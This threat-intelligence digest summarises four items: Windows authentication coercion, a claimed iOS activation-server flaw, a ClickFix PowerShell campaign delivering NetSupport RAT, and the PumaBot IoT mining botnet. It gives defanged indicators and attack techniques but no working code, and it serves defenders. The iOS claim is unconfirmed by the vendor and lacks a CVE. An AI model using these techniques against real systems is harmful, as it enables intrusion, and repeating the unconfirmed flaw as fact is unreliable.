Authentication Coercion in Windows: A Persistent and Growing Threat
Authentication coercion attacks have become an increasingly significant concern in Windows environments because they allow attackers to exploit vulnerabilities in systems with low-privileged domain accounts. By manipulating RPC interfaces, attackers can coerce a targeted system, often high-value servers or domain controllers, into authenticating to an attacker-controlled host. This technique is especially dangerous as it leverages NTLM and Kerberos relay attacks to intercept and relay authentication sessions, potentially granting administrative access or enabling lateral movement across the network. These attacks have been observed in various campaigns, with attackers exploiting misconfigured systems, particularly those using default NTLM configurations, which are common in legacy environments. While not exploited in the wild, the growing use of tools like Coercer to automate and accelerate exploitation means these attacks are becoming increasingly accessible to threat actors. Successful exploitation can lead to domain escalation, where attackers gain elevated privileges and can perform destructive actions, like stealing credentials or executing further attacks within the organization. Microsoft has acknowledged the threat posed by authentication coercion and responded by implementing several mitigations in newer Windows versions, Server 2025 and Windows 11 24H2. These include SMB and LDAP signing, channel binding, and Extended Protection for Authentication (EPA), which help prevent unauthorized relays by requiring cryptographic validation of sessions and messages. However, these protections are only enabled by default on fresh installations, meaning that many organizations with legacy systems or older versions of Windows remain vulnerable to coercion attacks. Additionally, despite these mitigations, many environments still have NTLM authentication enabled, which allows a wide range of coercion attack paths to remain open. As the threat landscape evolves, understanding the specifics of authentication coercion and deploying appropriate defenses remains critical to protecting Windows environments.
Flaw in Apple iOS Activation Infrastructure Exposes Devices to Persistent Tampering
A significant flaw has been discovered in Apple's iOS activation infrastructure, particularly in the iOS 18.5 stable release from May 2025, which poses a serious security risk to millions of Apple devices. The vulnerability lies in the activation endpoint (hXXps://humb[.]apple[.]com/humbug/baa), which improperly processes unauthenticated XML payloads during device setup. Attackers can exploit this flaw by injecting malformed XML files without authentication or signature verification, enabling them to alter device configurations during the initial setup phase. The flaw does not provide error feedback, making it difficult for users or Apple’s monitoring systems to detect unauthorized changes. The vulnerability exposes devices to pre-activation tampering, which could allow attackers to implant persistent profiles or modify device configurations, like network policies or MDM settings, without the user's knowledge. The flaw was identified through extensive testing by analysts at Substack, who discovered that the activation server’s lack of basic security mechanisms, including signature verification and input validation, creates opportunities for malicious actors to inject custom provisioning logic. This flaw does not require physical access to the device or jailbreaking, making it a particularly dangerous attack vector that could be exploited via malicious access points or rogue provisioning servers. Although there is no official confirmation from Apple or a CVE assigned to the flaw, its potential for widespread exploitation is concerning, especially for enterprise users who rely on secure provisioning methods. Apple has not responded to requests for comment or acknowledged the flaw, leaving the issue unresolved. This flaw specifically impacts iOS 18.5 on iOS devices and does not affect macOS; currently, no official patch or workaround is available. Without an official fix, users, and organizations are advised to implement stricter network security, avoid suspicious networks during device setup, and monitor for unusual device behavior post-activation.
Multi-Stage PowerShell Campaign Delivers NetSupport RAT via Fake Websites
A sophisticated cyberattack campaign has been uncovered, exploiting fake websites posing as legitimate services, including Gitcode and DocuSign, to deliver the NetSupport RAT malware. The attack begins with phishing emails or social media posts guiding victims to these counterfeit websites. Once on the site, users are tricked into executing a PowerShell script via the Windows Run command. The malicious script is designed to download additional PowerShell scripts, eventually installing NetSupport RAT on the compromised machine. These fake websites act as lures, with the attack leveraging multi-stage downloader scripts to evade detection and make it harder for security systems to trace the full attack. The attackers use sophisticated methods, including clipboard poisoning, to silently transfer the malicious script to the user’s clipboard, prompting them to run the command. The websites involved in this attack were masquerading as services that users are more likely to trust, including Gitcode and DocuSign, indicating the use of common social engineering techniques. The fake websites identified by DomainTools use subdomains like docusign.sa[.]com to host malicious scripts. These sites attempt to deceive users using a ClickFix-style CAPTCHA verification, asking victims to prove they are not robots. After completing this CAPTCHA, the user is directed to paste the PowerShell script into the Windows Run dialog, allowing the script to execute and download additional payloads. The attackers use a multi-stage process in which the first PowerShell script establishes persistence with a file called “wbdims[.]exe,” which was hosted on GitHub at the time of the attack. Following this, subsequent PowerShell scripts retrieve malicious payloads from external servers, leading to the installation of NetSupport RAT. DomainTools linked this campaign to the SocGholish threat group based on similarities in delivery URLs, domain naming, and registration patterns. NetSupport Manager, the legitimate tool used in the attack, is a known Remote Access Tool (RAT) that various threat groups, including FIN7 and Storm-0408, have hijacked. This attack demonstrates the growing use of deceptive websites and social engineering tactics to target users and organizations.
PumaBot IoT Botnet Targets Vulnerable Linux Devices with Sophisticated Techniques for Cryptocurrency Mining
PumaBot, a new Linux-based botnet, has emerged as a significant threat to organizations utilizing Internet of Things (IoT) devices, especially in sectors reliant on surveillance systems. Unlike typical botnets that scan the internet indiscriminately for vulnerabilities, PumaBot uses a more targeted approach by retrieving curated lists of IP addresses from its command-and-control servers. This allows it to focus on specific vulnerable devices, reducing the risk of detection from security systems designed to flag mass scanning activities. Researchers at PolySwarm identified the botnet, which explicitly targets devices running Linux, with a notable focus on surveillance and traffic camera systems, including those manufactured by Pumatronix. PumaBot uses brute-force SSH credential attacks to compromise devices, and its stealthy approach has made it particularly dangerous for organizations with weak security practices, particularly those using default passwords. Once PumaBot successfully infiltrates a device, it executes advanced persistence tactics. The malware installs itself in critical system directories, including /lib/redis. It mimics legitimate services by creating system service files named after common applications like Redis and MySQL, ensuring the malware automatically starts after a system reboot. It also gathers detailed system information, including operating system, kernel version, and architecture, and transmits this data back to the botnet’s command-and-control servers. PumaBot’s primary goal appears to be cryptocurrency mining, with the malware executing commands like "xmrig" and "networkxm" to hijack computing resources for illicit profit. This botnet underscores the growing risks in the IoT ecosystem, where weak security and default credentials make devices prime targets for cybercriminals. To mitigate these risks, organizations should change default passwords, implement strong authentication protocols, and monitor network traffic for unusual activity, particularly from devices that botnets like PumaBot could compromise.
